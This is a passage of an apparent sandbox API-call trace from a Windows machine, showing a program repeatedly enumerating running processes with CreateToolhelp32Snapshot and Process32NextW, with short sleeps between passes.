returned 1 [0103.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.861] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.862] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.940] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.941] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.942] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.943] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.944] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.945] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.946] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0103.947] CloseHandle (hObject=0xbc) returned 1 [0103.947] Sleep (dwMilliseconds=0x12c) [0104.306] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0104.311] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.318] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.319] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.319] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.320] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.324] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.332] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.333] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.334] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.335] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.336] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.337] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.338] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.339] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.340] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.341] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.342] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.343] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.344] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.399] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.402] CloseHandle (hObject=0xc4) returned 1 [0104.402] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0104.407] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.415] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.415] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
